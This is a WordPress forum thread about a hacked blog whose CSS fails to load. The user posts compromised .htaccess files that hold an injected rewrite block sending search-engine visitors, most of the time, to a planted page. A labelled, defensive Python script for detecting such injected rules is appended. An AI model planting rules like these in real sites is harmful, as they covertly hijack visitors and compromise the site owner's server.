CSS got hacked (11 posts)

  1. dioni
    Member
    Posted 6 years ago #

    One of my blogs got hacked. The CSS is not displaying, including the one for the admin dashboard. The files are all there. I reckon someone hacked the backend code somehow. I tried to clean up everything (delete and reinstall WordPress) twice and changed the password, but the hacker came back the next day. I tried to update to the newest WordPress. I checked the permissions on my .htaccess file and they're fine. Has anyone experienced this before?

    Site: http://www.meexia.com/bookie

  2. garbonzo
    Member
    Posted 6 years ago #

    I'm not so sure you got hacked... I should be able to download your css file and look at it, but I can't. Maybe it's missing?

  3. moshu
    Member
    Posted 6 years ago #

    The files all are NOT there - regardless of what you think!
    http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css
    Not found. Take it from there...

  4. dioni
    Member
    Posted 6 years ago #

    Well, yeah, that's the problem. The file is there when I check it with FTP! With the right permission too (644), all folders with the right permission. Basically all my files are intact. But you can't access it.

  5. dioni
    Member
    Posted 6 years ago #

    I meant you can't access them from browsers (like what you tried). I checked that all files have sensible size too (no 0 size).

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Basically all my files are intact. But you can't access it.

    Well, that's not a hack, that is a server problem. You need to talk to your hosting service.

  7. dioni
    Member
    Posted 6 years ago #

    Well, I just don't get how it worked one day and not the next day. It also works for a few of my WordPress sites and not for a couple of them (which I suspected got hacked) --> all hosted on the same server. Can anybody think of anything else?

    Meanwhile I'll try to talk with my hosting service. But I doubt that this is the problem, because it DOES work with my other WordPress blogs (I have multiple WordPress installations on the server).

    Note that the initial installation worked fine. Then it got messed up the next day. Why would my host alter any files or the settings of ONE subfolder? (and without telling me) I have WordPress blogs in other folders and they're all fine. And I'm using GoDaddy btw, so it should be quite reliable.

  8. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    If the file is there and has correct permissions, but you cannot access it through a web browser, then it's some kind of problem with your server. It's as simple as that. This has nothing to do with WordPress at all. You say the file exists, but the server returns a 404 error for it. That doesn't go through WordPress at all, that's a simple "get a file through a webserver" thing.

    Now, I use GoDaddy too, and they are everything *except* reliable in my experience. But, I have no idea why it doesn't work for your case. I also have no idea why it would work one day and not the next. But I'll lay it out quite clearly:

    The CSS file should exist here:
    http://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css

    But it does not. That's the problem. It's as simple as that. Figure out why that link doesn't pull up the CSS file, and the problem will be fixed.

    BTW, what is the content of your .htaccess file in the bookie directory? Same goes for the main web root directory, what's the .htaccess there? Perhaps you have something there that you should not have.

  9. dioni
    Member
    Posted 6 years ago #

    This is the content of my .htaccess in main directory:
    # a0b4df006e02184c60dbf503e71c87ad
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
    RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
    RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
    # a995d2cc661fa72452472e9554b5520c

    This is the content of my .htaccess in bookie directory:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /bookie/
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    # a0b4df006e02184c60dbf503e71c87ad
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
    RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
    RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
    RewriteCond %{TIME_SEC} <59
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
    # a995d2cc661fa72452472e9554b5520c

    RewriteRule . /bookie/index.php [L]
    </IfModule>

    # END WordPress

  10. dioni
    Member
    Posted 6 years ago #

    Okay I just saw that this line looks very suspicious:
    RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]

    Many months ago I got a few emails from various people saying that my server had been compromised and that it hosted some files attacking other people's servers. I deleted the folder, and it looks like it contains new files now (they're different from the last ones). So I just deleted that folder again, and then deleted the .htaccess file in the /blog/ directory (cos the content looked suspicious too). I wonder if that's enough. I think it's possible that there was some harmful file inside a WordPress theme that I put in.
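
Added example (not part of the original thread, and not WordPress or GoDaddy code): a small Python audit for the two things visible in the .htaccess files posted above, a rewrite rule gated on a search-engine `HTTP_REFERER`, and a `RewriteRule . …/index.php` that has lost its `!-f`/`!-d` conditions. mod_rewrite attaches conditions only to the next `RewriteRule`, so once the injected rule consumes them the front-controller rule also catches requests for existing files such as style.css. The function name `audit_htaccess`, the engine shortlist and the shortened sample are assumptions made for illustration.

```python
import re

# Directive patterns, based on the injected block quoted in the thread.
COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
ENGINES = re.compile(r"google|yahoo|msn|yandex", re.I)  # assumed shortlist

def audit_htaccess(text):
    """Return (line_no, finding) tuples for the text of one .htaccess file."""
    findings, pending = [], []      # pending = conditions awaiting their rule
    for no, line in enumerate(text.splitlines(), 1):
        cond, rule = COND.match(line), RULE.match(line)
        if cond:
            pending.append(cond.groups())
        elif rule:
            target = rule.group(2)
            referer = any(var.upper() == "%{HTTP_REFERER}" and ENGINES.search(pat)
                          for var, pat in pending)
            guards = {pat for var, pat in pending
                      if var.upper() == "%{REQUEST_FILENAME}"}
            if referer:
                findings.append((no, f"search-referrer redirect to {target}"))
            elif target.endswith("index.php") and not {"!-f", "!-d"} <= guards:
                findings.append((no, "front-controller rule lost its !-f/!-d guards"))
            pending = []            # conditions bind to one RewriteRule only
    return findings

# Constructed sample: the /bookie/ file from the thread, engine list shortened.
SAMPLE = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /bookie/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo)\. [NC]
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
RewriteRule . /bookie/index.php [L]
</IfModule>
# END WordPress
"""

if __name__ == "__main__":
    for line_no, finding in audit_htaccess(SAMPLE):
        print(f"line {line_no}: {finding}")
```

Run over every .htaccess from the web root down, since the thread shows the same block present in more than one directory.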

  11. syncbox
    Member
    Posted 6 years ago #

    Never mind... I edited my comment. GoDaddy, btw, STILL doesn't offer the latest version of WordPress... and I was the one that got them to go from 2.1.2 to 2.3.2 (trying to get them to stay up-to-date)...

    anyway, good luck with your issues... I got hacked once and I've been much more diligent about keeping WordPress up-to-date since.
